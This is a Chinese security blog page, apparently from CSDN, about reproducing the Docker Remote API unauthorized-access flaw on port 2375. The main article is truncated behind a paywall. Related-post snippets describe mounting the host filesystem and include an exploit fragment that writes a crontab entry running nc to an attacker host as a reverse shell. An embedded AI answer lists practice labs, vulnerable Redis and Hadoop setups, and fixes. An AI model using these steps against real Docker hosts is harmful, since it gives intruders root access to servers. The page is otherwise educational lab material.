docker未授权访问漏洞总结

最新推荐文章于 2025-03-27 16:37:15 发布
原创 最新推荐文章于 2025-03-27 16:37:15 发布 · 1.5k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了Docker未授权访问漏洞的概念,包括其允许攻击者通过Docker API执行命令。通过环境搭建和漏洞利用的步骤,演示了如何复现这一漏洞,特别是在端口2375上。利用Python的Docker库,创建了一个脚本以写入计划任务并反弹shell。此过程展示了安全风险,并强调了保护Docker接口的重要性。

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言

记录并复现常见的未授权访问漏洞

一、docker未授权访问漏洞是什么?

Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。常见端口2375

二、复现

1.环境搭建

在这里插入图片描述
如果访问如下页面,返回一个json格式的值{“message”:“page not found”}即存在漏洞也可以访问ip/version或者ip/info获取基本信息

2 漏洞利用

import docker

client = docker.DockerClient(base_url='http://192.168.1.8:2375/')
data = client.
最低0.47元/天 解锁文章
web渗透测试漏洞复现:docker API未授权漏洞复现并getshell
HACKONE的博客
03-28 803
总结一句话:该命令的作用是在IP为192.168.1.106的远程Docker守护进程上,基于镜像ID为2dc39ba059dc的镜像启动一个新的交互式容器,并挂载主机的根目录到容器内的/mnt目录,然后在新容器中打开一个Bash shell。由于Docker API提供了丰富的功能,它不仅为Docker CLI(命令行界面)提供底层支持,也被许多其他工具和平台广泛采用,如Kubernetes、Docker Compose等,实现了对Docker容器的自动化管理和大规模部署。
redis 未授权访问漏洞详解
m0_69043895的博客
04-22 1913
1、redis 绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。2、没有设置密码认证(默认密码为空),可以免密码远程登录redis服务。
Docker 未授权访问漏洞
Thunderclap的博客
07-13 2634
Docker 未授权访问漏洞
未授权访问Docker未授权访问漏洞
qq_68163788的博客
05-14 3663
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
Docker未授权访问漏洞
周星星的博客
09-01 2498
docker未授权访问漏洞复现,漏洞利用,修复方法
Docker未授权访问漏洞(www.hetianlab.com)
懂进攻知防守
07-20 3636
Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。Docker Daemon把服务暴露在tcp的2375端口上,这样就可以在网络上操作Docker了。Docker本身没有身份认证的功能,只要网络上能访问到服务端口,就可以操作Docker。...
Docker未授权访问漏洞详解
m0_64481831的博客
06-11 2573
Docker是一个开源的引擎,可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。
未授权访问漏洞总结
墨鱼菜鸡
07-28 589
目录 一、MongoDB 未授权访问漏洞 二、Redis 未授权访问漏洞 三、Memcached 未授权访问漏洞CVE-2013-7239 四、JBOSS 未授权访问漏洞 五、VNC 未授权访问漏洞 六、Docker 未授权访问漏洞 七、ZooKeeper 未授权访问漏洞 八、Rsync 未...
云安全之k8s未授权漏洞总结
未完成的歌~的博客
03-27 2477
全称是 kubernetes,是谷歌在2014年推出的一种开源容器编排系统,后来捐赠给了云原生计算基金会(CNCF)。因将k后面的8个字母进行缩写后,被广泛简称为K8s。随着容器技术的发展,面临着容器数量庞大、难以管理的问题,K8s的推出很好的解决了这一问题,并且在容器编排系统中占据领先地位。Kubernetes 的名字来源于希腊语,意为“舵手”或“领航员”,寓意着它在容器编排领域如同舵手一般,引领着容器化应用的运行(docker的logo是一个运输船)。Master:管事的(决策者)
Docker远程接口未授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 3147
Docker远程接口未授权访问漏洞解决方案之 Docker Remote API TLS 认证
漏洞复现 - - -Docker未授权访问漏洞
weixin_67503304的博客
08-16 5767
Docker未授权访问漏洞docker未授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
Docker API 未授权访问漏洞
qq_42383069的博客
05-09 8370
Docker API 未授权访问漏洞 1、漏洞简介 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 2、漏洞原理 利用 Docker 节点上开放的 TCP 端口 2375 远程执行 Docker 命令,进而可获取服务器 Root 权限。 3、漏洞环境搭建 这里我们直接使用 vluhub 环境 cd vulhub/docker/una
未授权访问漏洞
C233333235的博客
08-04 2092
Redis 默认情况下,会绑定在,如果没有进⾏采⽤相关的策略,⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设 置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下未授权Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利⽤ Redis ⾃身的提供的config 命令,可以进⾏写⽂件操作,攻击者可以成功将⾃⼰的ssh公钥写⼊⽬标服务器的/root/.ssh ⽂件夹的。
docker daemon api 未授权访问漏洞
EC_Carrot的博客
05-26 293
漏洞复现 利用方法是,我们随意启动一个容器,并将宿主机的/etc目录挂载到容器中,便可以任意读写文件了。我们可以将命令写入crontab配置文件,进行反弹shell。 利用EXP: import docker client = docker.DockerClient(base_url='http://attack-ip:2375/') data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc yo
配置开启Docker2375远程连接与解决Docker未授权访问漏洞
Sherry
11-13 6628
配置开启Docker2375远程连接与解决Docker未授权访问漏洞
Docker Remote API 未授权访问漏洞
weixin_53736204的博客
08-04 819
Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供。
未授权访问漏洞靶场
最新发布
04-01
<think>好的,我现在需要帮助用户寻找关于未授权访问漏洞的靶场和学习资源。首先,我得回顾用户提供的引用内容,看看里面有没有相关的信息。用户提到了引用1到5,其中引用2、3、4、5都提到了靶场或者相关漏洞的实战内容。比如引用2提到了Hadoop和Redis的靶场实战,引用3提到了访问特定路径获取信息,引用4提到了漏洞复现和GETSHELL的方法,引用5则介绍了WebGoat这个Java靶场程序。 接下来,我需要整理这些信息,给出用户具体的靶场资源。首先,Vulfocus在引用2和4中被提到,应该是一个综合靶场平台,支持多漏洞环境,包括Hadoop和Redis的未授权访问。然后WebGoat在引用5里,虽然主要针对Web漏洞,但可能包含相关的内容。另外,用户可能需要自己搭建环境,比如用Docker部署Hadoop或Redis,这在引用3中提到过修复方法,可能搭建时需要注意安全配置。 然后,用户可能还需要学习资源,比如文章或实战指南。引用2和3的标题都涉及未授权访问漏洞的总结和实战,可以推荐相关的文章链接。另外,Metasploitable和DVWA虽然主要是其他漏洞,但可能也包含未授权访问的案例,需要确认一下。 还要注意用户提到的合规性问题,引用1强调了在非授权情况下进行渗透测试是不合法的,所以必须建议用户在本地搭建靶场,如引用4提到的靶场环境下载方式,或者在Vulfocus这样的平台上练习。 最后,要确保回答结构清晰,分点列出靶场推荐、学习资源、注意事项,并且每个部分都有具体的例子和引用来源。同时,生成的相关问题要围绕用户可能进一步的需求,比如漏洞原理、修复方法、搭建步骤等。</think>### 未授权访问漏洞靶场与学习资源推荐 #### 一、靶场环境推荐 1. **Vulfocus综合漏洞靶场** - 支持Hadoop、Redis、Kubernetes等未授权访问漏洞的实战环境 - 提供一键启动的容器化靶场,可直接通过Web界面操作 - 示例漏洞复现: - Redis未授权访问导致GETSHELL(需配合SSH密钥写入)[^4] - Hadoop YARN未授权访问远程命令执行 - 平台地址:`https://vulfocus.cn/` [^2][^4] 2. **WebGoat靶场(OWASP官方)** - 包含访问控制缺陷相关实验(部分涉及未授权访问原理) - 提供30+安全实验课程,含视频演示和分步骤指导 - 项目地址:`https://github.com/WebGoat/WebGoat` [^5] 3. **自建环境(推荐)** - **Hadoop/YARN环境搭建**: ```bash docker pull sequenceiq/hadoop-docker docker run -it -p 8088:8088 sequenceiq/hadoop-docker /etc/bootstrap.sh -bash ``` - **Redis未授权环境**: ```bash docker run -d -p 6379:6379 redis --protected-mode no ``` - 注意:需关闭服务认证模块模拟漏洞[^3] #### 二、学习资源 1. **漏洞原理与实战文章** - 《Hadoop & Redis未授权访问漏洞分析与利用》 - 《Kubernetes API未授权访问漏洞修复指南》 2. **渗透测试方法论** - 未授权访问漏洞的发现路径: - 端口扫描 → 服务识别 → 尝试默认配置访问 → 利用工具验证 - 常用工具链:Nmap、Redis-cli、Metasploit(含Hadoop exploit模块) 3. **合规性注意事项** - 必须使用本地或授权靶场进行测试(如Vulfocus)[^1] - 禁止对非授权目标实施扫描/渗透操作 #### 三、典型漏洞修复方案 1. 强制启用认证机制(如Redis的`requirepass`)[^3] 2. 限制服务监听IP(如Hadoop绑定内网地址) 3. Kubernetes需配置`--anonymous-auth=false` 4. 使用网络ACL限制访问源(如云服务器安全组规则)
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值